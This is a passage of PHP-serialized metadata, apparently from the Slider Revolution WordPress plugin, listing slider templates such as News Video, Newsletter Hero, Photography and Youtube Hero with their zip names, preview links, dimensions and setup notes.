Video\";s:5:\"alias\";s:10:\"news-video\";s:3:\"zip\";s:14:\"news-video.zip\";s:3:\"uid\";s:32:\"f901e9e16e0363248156c2209eb584e9\";s:3:\"img\";s:21:\"news-video/slider.jpg\";s:7:\"preview\";s:58:\"http://revolution.themepunch.com/wordpress-content-blocks/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"500\";s:11:\"description\";s:128:\"<span class=\"ttm_content\">A Vimeo background video hero block with play / pause buttons.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:289:\"<span class=\"ttm_content\">This is a \"Default\" content hero slider. Just edit the slide to change the video and texts.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:20;a:22:{s:2:\"id\";s:2:\"21\";s:5:\"title\";s:15:\"Newsletter Hero\";s:5:\"alias\";s:15:\"newsletter-hero\";s:3:\"zip\";s:19:\"newsletter-hero.zip\";s:3:\"uid\";s:32:\"6290a9864d8c4c6311784586ed1cc5fe\";s:3:\"img\";s:26:\"newsletter-hero/slider.jpg\";s:7:\"preview\";s:61:\"http://revolution.themepunch.com/wordpress-newsletter-signup/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"600\";s:11:\"description\";s:137:\"<span class=\"ttm_content\">This hero block uses a custom styled Mailchimp newsletter signup field.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:435:\"<span class=\"ttm_content\">This is a \"Default\" content hero slider. Just edit the slide to change the background image, texts, and <a href=\"https://www.themepunch.com/faq/how-to-setup-mailchimp-for-the-newsletter-hero-template/\" target=\"_blank\">Mailchimp code</a>.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:21;a:22:{s:2:\"id\";s:2:\"22\";s:5:\"title\";s:11:\"Not Generic\";s:5:\"alias\";s:10:\"notgeneric\";s:3:\"zip\";s:14:\"notgeneric.zip\";s:3:\"uid\";s:32:\"9d87ba95e02210a9f82387add2ceadf9\";s:3:\"img\";s:21:\"notgeneric/slider.jpg\";s:7:\"preview\";s:61:\"http://revolution.themepunch.com/wordpress-fullscreen-slider/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:144:\"<span class=\"ttm_content\">A full-screen slider with a layer based navigation and sleek content elements.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:583:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Edit the slides to change images and texts.<br/>Some content is in <a href=\"https://www.themepunch.com/slider-revolution/global-layers/\" target=\"_blank\">\"Static / Global Layers\"</a><br/><br/></span>\r\n<span class=\"ttm_content\">Instructions for <a href=\"https://www.themepunch.com/faq/modify-burger-menu/\" target=\"_blank\">changing the menu</a>.</span><br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:22;a:22:{s:2:\"id\";s:2:\"23\";s:5:\"title\";s:11:\"Photography\";s:5:\"alias\";s:11:\"photography\";s:3:\"zip\";s:15:\"photography.zip\";s:3:\"uid\";s:32:\"1b2072547afb75e49f33b016751ed360\";s:3:\"img\";s:22:\"photography/slider.jpg\";s:7:\"preview\";s:62:\"http://revolution.themepunch.com/wordpress-photography-slider/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:194:\"<span class=\"ttm_content\">A front-page slider that can be used as an intro for your website. Navigate by using mouse-wheel scroll or the layer-based menu.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:583:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Edit the slides to change images and texts.<br/>Some content is in <a href=\"https://www.themepunch.com/slider-revolution/global-layers/\" target=\"_blank\">\"Static / Global Layers\"</a><br/><br/></span>\r\n<span class=\"ttm_content\">Instructions for <a href=\"https://www.themepunch.com/faq/modify-burger-menu/\" target=\"_blank\">changing the menu</a>.</span><br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:23;a:22:{s:2:\"id\";s:2:\"24\";s:5:\"title\";s:20:\"Photography Carousel\";s:5:\"alias\";s:20:\"photography-carousel\";s:3:\"zip\";s:24:\"photography-carousel.zip\";s:3:\"uid\";s:32:\"9a84b859ba23dc49ba8784e3a86545fa\";s:3:\"img\";s:31:\"photography-carousel/slider.jpg\";s:7:\"preview\";s:57:\"http://revolution.themepunch.com/wordpress-photo-gallery/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:196:\"<span class=\"ttm_content\">A front-page carousel that can be used as an intro for your website. Navigate by using mouse-wheel scroll or the layer-based menu.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:583:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Edit the slides to change images and texts.<br/>Some content is in <a href=\"https://www.themepunch.com/slider-revolution/global-layers/\" target=\"_blank\">\"Static / Global Layers\"</a><br/><br/></span>\r\n<span class=\"ttm_content\">Instructions for <a href=\"https://www.themepunch.com/faq/modify-burger-menu/\" target=\"_blank\">changing the menu</a>.</span><br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:1:{i:0;s:8:\"carousel\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:24;a:22:{s:2:\"id\";s:2:\"25\";s:5:\"title\";s:16:\"Search Form Hero\";s:5:\"alias\";s:16:\"search-form-hero\";s:3:\"zip\";s:20:\"search-form-hero.zip\";s:3:\"uid\";s:32:\"e09eb1bd0f22b3a2b02a1aa251dd1f3e\";s:3:\"img\";s:27:\"search-form-hero/slider.jpg\";s:7:\"preview\";s:60:\"http://revolution.themepunch.com/wordpress-search-form-hero/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"600\";s:11:\"description\";s:158:\"<span class=\"ttm_content\">This hero block uses a custom styled input field to show search results on a WordPress site.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:320:\"<span class=\"ttm_content\">This is a \"Default\" content hero slider. Just edit the slide to change the background image, texts, and search field code.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:25;a:22:{s:2:\"id\";s:2:\"26\";s:5:\"title\";s:17:\"Showcase Carousel\";s:5:\"alias\";s:16:\"showcasecarousel\";s:3:\"zip\";s:20:\"showcasecarousel.zip\";s:3:\"uid\";s:32:\"c5ca218398331bd2c064efc2f62eae56\";s:3:\"img\";s:27:\"showcasecarousel/slider.jpg\";s:7:\"preview\";s:62:\"http://revolution.themepunch.com/wordpress-cover-flow-gallery/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:3:\"600\";s:6:\"height\";s:3:\"600\";s:11:\"description\";s:129:\"<span class=\"ttm_content\">A fancy carousel that rotates, fades and scales slider items.</span>\r\n<span class=\"ttm_space\"></span>\r\n\";s:11:\"setup_notes\";s:284:\"<span class=\"ttm_content\">This is a \"Default\" content carousel. Just edit the slides to change images and texts.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:1:{i:0;s:8:\"carousel\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:26;a:22:{s:2:\"id\";s:2:\"27\";s:5:\"title\";s:11:\"Sports Hero\";s:5:\"alias\";s:11:\"sports-hero\";s:3:\"zip\";s:14:\"sportshero.zip\";s:3:\"uid\";s:32:\"8de7a145f32a362d618d2595ffa2f724\";s:3:\"img\";s:21:\"sportshero/slider.jpg\";s:7:\"preview\";s:54:\"http://revolution.themepunch.com/wordpress-image-hero/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"720\";s:11:\"description\";s:113:\"<span class=\"ttm_content\">An sports themed image hero block with buttons.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:300:\"<span class=\"ttm_content\">This is a \"Default\" content hero slider. Just edit the slide to change the background image and texts.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:27;a:22:{s:2:\"id\";s:2:\"28\";s:5:\"title\";s:12:\"Twitter Feed\";s:5:\"alias\";s:12:\"twitter-feed\";s:3:\"zip\";s:16:\"twitter-feed.zip\";s:3:\"uid\";s:32:\"efbfc2af5da5258e7b7bed8598e483cc\";s:3:\"img\";s:23:\"twitter-feed/slider.jpg\";s:7:\"preview\";s:56:\"http://revolution.themepunch.com/wordpress-twitter-feed/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:3:\"800\";s:6:\"height\";s:3:\"640\";s:11:\"description\";s:173:\"<span class=\"ttm_content\"> This slider is automatically populated by a Twitter stream. Just one slide is needed to show a whole feed!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:414:\"<span class=\"ttm_content\">The content source is set to <a href=\"https://www.themepunch.com/slider-revolution/module-content/#flickr\" target=\"_blank\">\"Twitter Stream\"</a>. Make sure to input your correct API information in the slider settings.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:11:\"socialmedia\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:28;a:22:{s:2:\"id\";s:2:\"29\";s:5:\"title\";s:13:\"Vimeo Gallery\";s:5:\"alias\";s:13:\"vimeo-gallery\";s:3:\"zip\";s:17:\"vimeo-gallery.zip\";s:3:\"uid\";s:32:\"fa824ce1ff3942ec268fc9eda60df539\";s:3:\"img\";s:24:\"vimeo-gallery/slider.jpg\";s:7:\"preview\";s:57:\"http://revolution.themepunch.com/wordpress-vimeo-gallery/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1230\";s:6:\"height\";s:3:\"692\";s:11:\"description\";s:170:\"<span class=\"ttm_content\">This slider is automatically populated by a Vimeo stream. Just one slide is needed to show a whole feed!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:412:\"<span class=\"ttm_content\">The content source is set to <a href=\"https://www.themepunch.com/slider-revolution/module-content/#flickr\" target=\"_blank\">\"Vimeo Stream\"</a>. Make sure to input your correct API information in the slider settings.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:11:\"socialmedia\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:29;a:22:{s:2:\"id\";s:2:\"30\";s:5:\"title\";s:10:\"Vimeo Hero\";s:5:\"alias\";s:9:\"vimeohero\";s:3:\"zip\";s:13:\"vimeohero.zip\";s:3:\"uid\";s:32:\"c575575f96173d88589cddcb06120b77\";s:3:\"img\";s:20:\"vimeohero/slider.jpg\";s:7:\"preview\";s:54:\"http://revolution.themepunch.com/wordpress-hero-vimeo/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"600\";s:11:\"description\";s:116:\"<span class=\"ttm_content\">A commonly used Vimeo video background hero block.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:464:\"<span class=\"ttm_content\">This is a \"Default\" content hero slider. Just edit the slide to change the background video and texts.<br/><br/></span>\r\nScreencast for <a href=\"https://www.youtube.com/playlist?list=PLSCdqDWVMJPPXEuOEqYEQMAsp0vAYw52_\" target=\"_blank\">mobile video</a> considerations.</a>\r\n<br/><br/>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:30;a:22:{s:2:\"id\";s:2:\"31\";s:5:\"title\";s:16:\"Web Product Dark\";s:5:\"alias\";s:16:\"web-product-dark\";s:3:\"zip\";s:20:\"web-product-dark.zip\";s:3:\"uid\";s:32:\"39b872cf0608e63c3a503e58374dc30a\";s:3:\"img\";s:27:\"web-product-dark/slider.jpg\";s:7:\"preview\";s:60:\"http://revolution.themepunch.com/wordpress-frontpage-slider/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1400\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:194:\"<span class=\"ttm_content\">A front-page slider that can be used as an intro for your website. Navigate by using mouse-wheel scroll or the layer-based menu.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:583:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Edit the slides to change images and texts.<br/>Some content is in <a href=\"https://www.themepunch.com/slider-revolution/global-layers/\" target=\"_blank\">\"Static / Global Layers\"</a><br/><br/></span>\r\n<span class=\"ttm_content\">Instructions for <a href=\"https://www.themepunch.com/faq/modify-burger-menu/\" target=\"_blank\">changing the menu</a>.</span><br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:31;a:22:{s:2:\"id\";s:2:\"32\";s:5:\"title\";s:21:\"Web Product Dark Hero\";s:5:\"alias\";s:21:\"web-product-dark-hero\";s:3:\"zip\";s:25:\"web-product-dark-hero.zip\";s:3:\"uid\";s:32:\"b6784e8925221f36677217979d26e6f0\";s:3:\"img\";s:32:\"web-product-dark-hero/slider.jpg\";s:7:\"preview\";s:56:\"http://revolution.themepunch.com/wordpress-header-image/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1400\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:162:\"<span class=\"ttm_content\">A modern hero block with three common devices. The screens of each device can be changed easily!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:300:\"<span class=\"ttm_content\">This is a \"Default\" content hero slider. Just edit the slide to change the background image and texts.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:32;a:22:{s:2:\"id\";s:2:\"33\";s:5:\"title\";s:22:\"Web Product Light Hero\";s:5:\"alias\";s:22:\"web-product-light-hero\";s:3:\"zip\";s:26:\"web-product-light-hero.zip\";s:3:\"uid\";s:32:\"428e65d6aaa6ef775429989d50516492\";s:3:\"img\";s:33:\"web-product-light-hero/slider.jpg\";s:7:\"preview\";s:54:\"http://revolution.themepunch.com/hero-image-wordpress/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1400\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:162:\"<span class=\"ttm_content\">A modern hero block with three common devices. The screens of each device can be changed easily!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:289:\"<span class=\"ttm_content\">This is a \"Default\" content hero slider. Just edit the slide to change the image and texts.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:33;a:22:{s:2:\"id\";s:2:\"34\";s:5:\"title\";s:17:\"Web Product Light\";s:5:\"alias\";s:15:\"webproductlight\";s:3:\"zip\";s:19:\"webproductlight.zip\";s:3:\"uid\";s:32:\"fa23dab5bf1139c6393828647a9de4e0\";s:3:\"img\";s:26:\"webproductlight/slider.jpg\";s:7:\"preview\";s:54:\"http://revolution.themepunch.com/wordpress-cover-page/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1400\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:194:\"<span class=\"ttm_content\">A front-page slider that can be used as an intro for your website. Navigate by using mouse-wheel scroll or the layer-based menu.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:583:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Edit the slides to change images and texts.<br/>Some content is in <a href=\"https://www.themepunch.com/slider-revolution/global-layers/\" target=\"_blank\">\"Static / Global Layers\"</a><br/><br/></span>\r\n<span class=\"ttm_content\">Instructions for <a href=\"https://www.themepunch.com/faq/modify-burger-menu/\" target=\"_blank\">changing the menu</a>.</span><br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:34;a:22:{s:2:\"id\";s:2:\"35\";s:5:\"title\";s:15:\"Youtube Gallery\";s:5:\"alias\";s:15:\"youtube-gallery\";s:3:\"zip\";s:19:\"youtube-gallery.zip\";s:3:\"uid\";s:32:\"ee9e4928ac74f5f0c0b697ce708f5aa7\";s:3:\"img\";s:26:\"youtube-gallery/slider.jpg\";s:7:\"preview\";s:59:\"http://revolution.themepunch.com/wordpress-youtube-gallery/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"600\";s:11:\"description\";s:173:\"<span class=\"ttm_content\"> This slider is automatically populated by a YouTube stream. Just one slide is needed to show a whole feed!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:414:\"<span class=\"ttm_content\">The content source is set to <a href=\"https://www.themepunch.com/slider-revolution/module-content/#flickr\" target=\"_blank\">\"YouTube Stream\"</a>. Make sure to input your correct API information in the slider settings.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:11:\"socialmedia\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:35;a:22:{s:2:\"id\";s:2:\"36\";s:5:\"title\";s:12:\"Youtube Hero\";s:5:\"alias\";s:11:\"youtubehero\";s:3:\"zip\";s:15:\"youtubehero.zip\";s:3:\"uid\";s:32:\"e0b2c12a45841bdf21cb96305f2c85bf\";s:3:\"img\";s:22:\"youtubehero/slider.jpg\";s:7:\"preview\";s:58:\"http://revolution.themepunch.com/wordpress-youtube-header/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"600\";s:11:\"description\";s:104:\"<span class=\"ttm_content\">A YouTube video background hero block.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:633:\"<span class=\"ttm_content\">This is a \"Default\" content hero slider. Just edit the slide to change the background video and texts.<br/><br/></span>\r\nScreencast for <a href=\"https://www.youtube.com/playlist?list=PLSCdqDWVMJPPXEuOEqYEQMAsp0vAYw52_\" target=\"_blank\">mobile video</a> considerations.</a>\r\n<br/><br/>\r\nLearn how to <a href=\"https://www.themepunch.com/faq/enable-sound-for-the-youtube-hero-template/\" target=\"_blank\">enable sound for the background video</a><br /><br />\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:36;a:22:{s:2:\"id\";s:2:\"37\";s:5:\"title\";s:13:\"Scroll Effect\";s:5:\"alias\";s:13:\"scroll-effect\";s:3:\"zip\";s:17:\"scroll-effect.zip\";s:3:\"uid\";s:32:\"417f59e9db87aa7e47c8509eb88d4af6\";s:3:\"img\";s:23:\"scrolleffect/slide1.jpg\";s:7:\"preview\";s:60:\"http://revolution.themepunch.com/big-bold-fullscreen-slider/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"600\";s:11:\"description\";s:134:\"<span class=\"ttm_content\">A full-screen slider with a unique scroll effect and big, bold text.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:485:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Edit the slides to change images and texts.<br/>For further configuration options please view the <a href=\"https://https://www.themepunch.com/slider-revolution/custom-css-javascript/\" target=\"_blank\">\"Custom CSS/JS\"</a> section in the slider settings.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:37;a:22:{s:2:\"id\";s:2:\"38\";s:5:\"title\";s:12:\"Content Zoom\";s:5:\"alias\";s:12:\"content-zoom\";s:3:\"zip\";s:16:\"content-zoom.zip\";s:3:\"uid\";s:32:\"42ef8cdb70d42ec6ff6fa3b69a027b5f\";s:3:\"img\";s:22:\"contentzoom/slide1.jpg\";s:7:\"preview\";s:53:\"http://revolution.themepunch.com/content-zoom-slider/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"600\";s:11:\"description\";s:243:\"<span class=\"ttm_content\">A very unique full-width slider that uses <a href=\"https://www.themepunch.com/revslider-doc/layer-settings/#layeractions\" target=\"_blank\">\"Layer Actions\"</a> to their potential.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:371:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Edit the slides to change images and texts.<br/>It might be helpful to use the \"hide/show layer\" feature to efficiently edit all content.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:38;a:22:{s:2:\"id\";s:2:\"39\";s:5:\"title\";s:13:\"Food 